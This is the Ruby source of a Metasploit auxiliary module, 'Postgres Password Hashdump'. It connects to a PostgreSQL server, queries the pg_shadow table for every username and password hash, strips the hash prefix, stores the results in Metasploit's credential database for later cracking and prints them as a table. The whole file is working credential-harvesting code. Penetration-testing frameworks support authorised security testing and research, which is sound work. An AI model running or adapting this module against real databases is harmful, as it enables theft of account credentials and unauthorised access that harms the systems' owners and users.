##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Postgres
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Postgres Password Hashdump',
      'Description'    => %Q{
          This module extracts the usernames and encrypted password
        hashes from a Postgres server and stores them for later cracking.
      },
      'Author'         => ['theLightCosine'],
      'License'        => MSF_LICENSE
    )
    register_options([
      OptString.new('DATABASE', [ true, 'The database to authenticate against', 'postgres']),
      ])
    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')

  end

  def run_host(ip)

    #Query the Postgres Shadow table for username and password hashes and report them
    res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)

    #Error handling routine here, borrowed heavily from todb
    case res.keys[0]
    when :conn_error
      print_error("A Connection Error occured")
      return
    when :sql_error
      case res[:sql_error]
      when /^C42501/
        print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - Insufficient permissions."
        return
      else
        print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - #{res[:sql_error]}"
        return
      end
    when :complete
      print_status("Query appears to have run successfully")
    end


    tbl = Rex::Ui::Text::Table.new(
      'Header'  => 'Postgres Server Hashes',
      'Indent'   => 1,
      'Columns' => ['Username', 'Hash']
    )

    service_data = {
        address: ::Rex::Socket.getaddress(rhost,true),
        port: rport,
        service_name: 'postgres',
        protocol: 'tcp',
        workspace_id: myworkspace_id
    }

    credential_data = {
        origin_type: :service,
        jtr_format: 'postgres',
        module_fullname: self.fullname,
        private_type: :nonreplayable_hash
    }

    credential_data.merge!(service_data)


    res[:complete].rows.each do |row|
      next if row[0].nil? or row[1].nil?
      next if row[0].empty? or row[1].empty?
      password = row[1]
      password.slice!(0,3)

      credential_data[:username]     = row[0]
      credential_data[:private_data] = password

      credential_core = create_credential(credential_data)
      login_data = {
          core: credential_core,
          status: Metasploit::Credential::Login::Status::UNTRIED
      }
      login_data.merge!(service_data)
      create_credential_login(login_data)

      tbl << [row[0], password]
    end
    print_good("#{tbl.to_s}")

  end



end